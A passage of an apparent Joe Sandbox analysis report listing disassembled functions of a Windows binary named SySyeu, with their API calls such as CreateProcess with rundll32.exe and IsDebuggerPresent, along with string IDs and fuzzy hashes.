                                                                                                                • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,00000000,00000000,00000000), ref: 00E13F1E
                                                                                                                • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?), ref: 00E13F5C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLibraryMultiWide$AddressAllocErrorFreeLastLoadLocalProc_wtoi
                                                                                                                • String ID:
                                                                                                                • API String ID: 1343397253-0
                                                                                                                • Opcode ID: 3f35737156cdb835c683478ae3527484c05c8f70aee9891c1161d07284307bd4
                                                                                                                • Instruction ID: 61424653a24624a33050761ab86884d38c9e84ea76fe113a4a09cb196953a2a7
                                                                                                                • Opcode Fuzzy Hash: 3f35737156cdb835c683478ae3527484c05c8f70aee9891c1161d07284307bd4
                                                                                                                • Instruction Fuzzy Hash: 28314CB5A00205EFDB14CFA9C8549EFBBB9EF89704F248069E915A7350DB309E42CB60
                                                                                                                Function 00E15EF0 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 246 e15ef0-e15f22 __wgetmainargs
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wgetmainargs
                                                                                                                • String ID:
                                                                                                                • API String ID: 1709950718-0
                                                                                                                • Opcode ID: 51e252cd98d832f4848bda6422248a35598eab311e273e852bfc4fb681e53f71
                                                                                                                • Instruction ID: 6c894bac7a693da8a4a8d196927244f0b217647b790585f4b9ff350b79fd9e39
                                                                                                                • Opcode Fuzzy Hash: 51e252cd98d832f4848bda6422248a35598eab311e273e852bfc4fb681e53f71
                                                                                                                • Instruction Fuzzy Hash: 9CD012706C130CEFF7609F27AF4A8C13AA0A31CF40705B054F840B11A2DE75989C8F11

                                                                                                                Non-executed Functions

                                                                                                                Function 00E161C0 Relevance: 6.0, APIs: 4, Instructions: 13COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00E162F6,00E11000), ref: 00E161C7
                                                                                                                • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00E162F6,?,00E162F6,00E11000), ref: 00E161D0
                                                                                                                • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00E162F6,00E11000), ref: 00E161DB
                                                                                                                • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00E162F6,00E11000), ref: 00E161E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 3231755760-0
                                                                                                                • Opcode ID: 4a276c9e9a2de8fb9bf1dfe67ddb7c362b1d4b5fbad0a80769cf0ff9521d745b
                                                                                                                • Instruction ID: dead9b5eceea8f21e980b25b37ddeb6fe9dca4cda1ecacf35a15b2427b416e8f
                                                                                                                • Opcode Fuzzy Hash: 4a276c9e9a2de8fb9bf1dfe67ddb7c362b1d4b5fbad0a80769cf0ff9521d745b
                                                                                                                • Instruction Fuzzy Hash: B5D0C932900104BFCB002FF2EC1DA893E28FB48212F05C410F31AA2022CB314846CB61
                                                                                                                Function 00E125B2 Relevance: 4.7, APIs: 3, Instructions: 187threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00000000), ref: 00E1265E
                                                                                                                • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0 ref: 00E12737
                                                                                                                • OutputDebugStringW.API-MS-WIN-CORE-DEBUG-L1-1-0(?), ref: 00E127A1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 4268342597-0
                                                                                                                • Opcode ID: 53357a75ac604eeba6539083711a7b3028a9b111e0f12cef418fccfb028daa6c
                                                                                                                • Instruction ID: e0582a9b458367a99b73904404a80bb79b3b67ff838862f6b4d3c55d676e5ca4
                                                                                                                • Opcode Fuzzy Hash: 53357a75ac604eeba6539083711a7b3028a9b111e0f12cef418fccfb028daa6c
                                                                                                                • Instruction Fuzzy Hash: CD619E706002059FCB21DF39DD546EEBBE6BF84710B19952EE91AF32A0DB34E895CB50
                                                                                                                Function 00E1205A Relevance: 1.5, APIs: 1, Instructions: 33comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(00E1161C,00000000,00000001,00E11940,?), ref: 00E12072
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateInstance
                                                                                                                • String ID:
                                                                                                                • API String ID: 542301482-0
                                                                                                                • Opcode ID: c60f07d3db1ee06f25020485ce0d0bdba82bdd9037d40d39f06d6679a82800a7
                                                                                                                • Instruction ID: 467fc625cf38e70785839c096dedd0453158c3970d21a3d7c88ca95ed5b74e41
                                                                                                                • Opcode Fuzzy Hash: c60f07d3db1ee06f25020485ce0d0bdba82bdd9037d40d39f06d6679a82800a7
                                                                                                                • Instruction Fuzzy Hash: 68F05E35740228BFCA00DB55DC55FCD7769EB88710F144095FA06F7291CAB1AE45CB90
                                                                                                                Function 00E16510 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_000064C0), ref: 00E16515
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: ea27bce258cb8104d6b861719c5da89d496eb21a3c023f5dc1add92af63a0dd2
                                                                                                                • Instruction ID: 217998b8d93924a701924f9bc09c61904ba2a6b52672d43758fa5006cb03f864
                                                                                                                • Opcode Fuzzy Hash: ea27bce258cb8104d6b861719c5da89d496eb21a3c023f5dc1add92af63a0dd2
                                                                                                                • Instruction Fuzzy Hash: 3C9002742526004A47046F716C1D58525A07B4DB1A7825550A056E4155DA514149D511
                                                                                                                Function 00E12100 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 165windowthreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000), ref: 00E121D8
                                                                                                                • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00E1223F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentFormatMessageThread
                                                                                                                • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                • API String ID: 2411632146-3173542853
                                                                                                                • Opcode ID: 6916cfa6827ff92fbbff5a14e19bc5844cb2390b2f8dd2d66b680680196907d0
                                                                                                                • Instruction ID: 66791140660ac3f9e4e86b6fcacbff341fe5f58ddfea1ee4668a0fe6df921a79
                                                                                                                • Opcode Fuzzy Hash: 6916cfa6827ff92fbbff5a14e19bc5844cb2390b2f8dd2d66b680680196907d0
                                                                                                                • Instruction Fuzzy Hash: F5512671600300BBDB309F658C09FEB76F9EB59704F046A9DF306B21A2DA7299E4CB51
                                                                                                                Function 00E13B09 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 107processsynchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00E13A51: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00E13A7B
                                                                                                                  • Part of subcall function 00E13A51: memset.MSVCRT ref: 00E13A8F
                                                                                                                  • Part of subcall function 00E13A51: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000040,?,00000000,00000000), ref: 00E13AA6
                                                                                                                  • Part of subcall function 00E13A51: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000), ref: 00E13AC1
                                                                                                                  • Part of subcall function 00E13A51: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,000000F8,?,00000000), ref: 00E13AE1
                                                                                                                  • Part of subcall function 00E13A51: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00E13AF3
                                                                                                                • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00E13B39
                                                                                                                • IsWow64Process2.API-MS-WIN-CORE-WOW64-L1-1-1(00000000), ref: 00E13B40
                                                                                                                • GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,000000F6), ref: 00E13B6C
                                                                                                                • PathCchAppend.API-MS-WIN-CORE-PATH-L1-1-0(?,00000105,rundll32.exe), ref: 00E13B87
                                                                                                                • RtlWow64IsWowGuestMachineSupported.NTDLL ref: 00E13BA9
                                                                                                                • GetSystemWow64Directory2W.API-MS-WIN-CORE-WOW64-L1-1-1(?,000000F6,?), ref: 00E13BC9
                                                                                                                • Wow64EnableWow64FsRedirection.API-MS-WIN-CORE-KERNEL32-PRIVATE-L1-1-0(00000000), ref: 00E13BD4
                                                                                                                • memset.MSVCRT ref: 00E13BE6
                                                                                                                • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00E13C08
                                                                                                                • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000), ref: 00E13C16
                                                                                                                • Wow64EnableWow64FsRedirection.API-MS-WIN-CORE-KERNEL32-PRIVATE-L1-1-0(00000001), ref: 00E13C20
                                                                                                                • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF), ref: 00E13C36
                                                                                                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00E13C44
                                                                                                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00E13C50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Wow64$File$CloseHandle$CreateEnableProcessReadRedirectionSystemmemset$AppendCommandCurrentDirectoryDirectory2GuestLineMachineObjectPathPointerProcess2SingleSupportedWait
                                                                                                                • String ID: rundll32.exe
                                                                                                                • API String ID: 1294557600-3034741169
                                                                                                                • Opcode ID: d4f45e43263cb4374a23ee49192e36b297ed7a2e21aaa097fc1da9b14681d4c2
                                                                                                                • Instruction ID: 7e9a7c4eeeee4aa5d3c5ff9f6babe55f97b23f2f156e639d03dbbd171eaa68fa
                                                                                                                • Opcode Fuzzy Hash: d4f45e43263cb4374a23ee49192e36b297ed7a2e21aaa097fc1da9b14681d4c2
                                                                                                                • Instruction Fuzzy Hash: 4B314F72A01129ABDB219F719C8DFEA77BDAB04700F0541A5E50AF2051EB349FC9DB50
                                                                                                                Function 00E137C3 Relevance: 15.1, APIs: 10, Instructions: 102threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002), ref: 00E137D4
                                                                                                                • CoInitializeSecurity.API-MS-WIN-CORE-COM-L1-1-0(00E119CC,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000000), ref: 00E137F0
                                                                                                                • CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 00E138E7
                                                                                                                  • Part of subcall function 00E1205A: CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(00E1161C,00000000,00000001,00E11940,?), ref: 00E12072
                                                                                                                • CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000001,00000000,00000000), ref: 00E13808
                                                                                                                • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00E1381D
                                                                                                                  • Part of subcall function 00E153AD: InitOnceExecuteOnce.API-MS-WIN-CORE-SYNCH-L1-2-0(00E184A4,00E153D0,00000000,00000000,00E1382A), ref: 00E153BB
                                                                                                                • CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?), ref: 00E13866
                                                                                                                • SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E13873
                                                                                                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00E1387A
                                                                                                                • CoWaitForMultipleHandles.API-MS-WIN-CORE-COM-L1-1-0(00000000,00007530,00000001,00E18420,?), ref: 00E13897
                                                                                                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00E138D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateEvent$CloseHandleInitializeOnce$CurrentExecuteHandlesInitInstanceMultipleSecurityThreadUninitializeWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 2536006573-0
                                                                                                                • Opcode ID: 792eafabc6bba838ac250b4c2223580624d4f7c85561604e3c8429f3dc4cfaaf
                                                                                                                • Instruction ID: 22bc03e2a6917546130d14c3044dcc113dd0e2cea00550fa17f7b297b7119194
                                                                                                                • Opcode Fuzzy Hash: 792eafabc6bba838ac250b4c2223580624d4f7c85561604e3c8429f3dc4cfaaf
                                                                                                                • Instruction Fuzzy Hash: 853184B1600305EFE7046FB2AD8DEEE7AADFB487497049029F516F2191DFB4D9888721
                                                                                                                Function 00E138F0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,000000C8), ref: 00E1391E
                                                                                                                • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000402,?,000000C8,?,000000C8), ref: 00E13963
                                                                                                                • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(CONOUT$,C0000000,00000003,00000000,00000003,00000000,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00E13992
                                                                                                                • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,?,?,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00E139D0
                                                                                                                • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,00E11844,00000002,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00E139E6
                                                                                                                • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,?,?,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00E13A15
                                                                                                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000001,?,00000402,?,000000C8,?,000000C8), ref: 00E13A1C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConsoleWrite$LoadString$CloseCreateFileHandle
                                                                                                                • String ID: CONOUT$
                                                                                                                • API String ID: 258192622-3130406586
                                                                                                                • Opcode ID: c6b9f07a532e886a46f27c1372232a79b8313b1b267bff60f52963d876fa26c2
                                                                                                                • Instruction ID: 7ce33db16dc779f84aa7a45f206e573d633720a59f17f7f06223d0dc89ec6d0f
                                                                                                                • Opcode Fuzzy Hash: c6b9f07a532e886a46f27c1372232a79b8313b1b267bff60f52963d876fa26c2
                                                                                                                • Instruction Fuzzy Hash: F8319331500119AFEB20DB25CD55FEB77BCEF49705F048095FA0AB6181E670AB49CE60
                                                                                                                Function 00E133F9 Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E13431
                                                                                                                • DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 00E13443
                                                                                                                • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E1346A
                                                                                                                • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E1347C
                                                                                                                • AcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E134CF
                                                                                                                • EncodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 00E134E1
                                                                                                                • DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(00000000), ref: 00E134EF
                                                                                                                • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 00E1350F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Lock$PointerReleaseShared$AcquireDecodeExclusive$Encode
                                                                                                                • String ID:
                                                                                                                • API String ID: 3770696666-0
                                                                                                                • Opcode ID: 3d47986642877ba1033fa486805d9d3c3b2666693b932519922dc825d93bbc18
                                                                                                                • Instruction ID: 05a6c338c4d05feecafcb7c389b22679a57f1c0044265b0d1d01be5828ff784e
                                                                                                                • Opcode Fuzzy Hash: 3d47986642877ba1033fa486805d9d3c3b2666693b932519922dc825d93bbc18
                                                                                                                • Instruction Fuzzy Hash: 41414935A00228EFCB05CF65D8988ADBBBAFF49B147158099E916F7321DB30AE41CB50
                                                                                                                Function 00E12B5A Relevance: 12.1, APIs: 8, Instructions: 100synchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?), ref: 00E12B6D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ObjectSingleWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 24740636-0
                                                                                                                • Opcode ID: 436114e046c1bf0a640aa817a191b2127b5df7f13fa9fe598bdc9019383124e0
                                                                                                                • Instruction ID: 0add149a35da1b60952993ea2835edac84085e316784408b8be8db56aa1f1ee6
                                                                                                                • Opcode Fuzzy Hash: 436114e046c1bf0a640aa817a191b2127b5df7f13fa9fe598bdc9019383124e0
                                                                                                                • Instruction Fuzzy Hash: 4931917070410AABEB205E66DC88BEF7769EF41358F209039F712F6281D774CDE69692
                                                                                                                Function 00E13D62 Relevance: 12.1, APIs: 8, Instructions: 98libraryloadermemoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _wtoi.MSVCRT(?), ref: 00E13D94
                                                                                                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?), ref: 00E13DA0
                                                                                                                • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?), ref: 00E13DD3
                                                                                                                • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,?,00000000,00000000), ref: 00E13DF1
                                                                                                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00E13E13
                                                                                                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00E13E30
                                                                                                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00E13E43
                                                                                                                • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,00000000,?,00000000,00000000), ref: 00E13E4C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Local$AllocByteCharFreeMultiWide_wtoi
                                                                                                                • String ID:
                                                                                                                • API String ID: 3528786098-0
                                                                                                                • Opcode ID: e6a8c2e41e977ffe783a81075f720945458c185daaa24222c800a0c695f21523
                                                                                                                • Instruction ID: 809e8abf10fd7144da5f91f83b5b7b87252c443fd0214b392c25fd367304743b
                                                                                                                • Opcode Fuzzy Hash: e6a8c2e41e977ffe783a81075f720945458c185daaa24222c800a0c695f21523
                                                                                                                • Instruction Fuzzy Hash: E531BF79600212EFCB214F65DC589EBBFB9EF497147148169FD06E3251D7708E45C6A0
                                                                                                                Function 00E13A51 Relevance: 9.1, APIs: 6, Instructions: 68fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00E13A7B
                                                                                                                • memset.MSVCRT ref: 00E13A8F
                                                                                                                • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000040,?,00000000,00000000), ref: 00E13AA6
                                                                                                                • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000), ref: 00E13AC1
                                                                                                                • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,000000F8,?,00000000), ref: 00E13AE1
                                                                                                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00E13AF3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Read$CloseCreateHandlePointermemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3827546496-0
                                                                                                                • Opcode ID: e7fd4b39a804c15b3e9239b9d382525ef5f3d4b81c363faf671282b895b4f964
                                                                                                                • Instruction ID: dc2958efb9da8f21a76deae9b8c93cbd8b9a86d442dd618948ee603d9d866cc8
                                                                                                                • Opcode Fuzzy Hash: e7fd4b39a804c15b3e9239b9d382525ef5f3d4b81c363faf671282b895b4f964
                                                                                                                • Instruction Fuzzy Hash: BB1193356001247BD7209B669C49FEF7B7CEF45720F004154FA18F20D0EA748A89CA61
                                                                                                                Function 00E15695 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 245COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CharNextW.API-MS-WIN-CORE-STRING-L2-1-0(?,00000000,?,00000000,?), ref: 00E15885
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
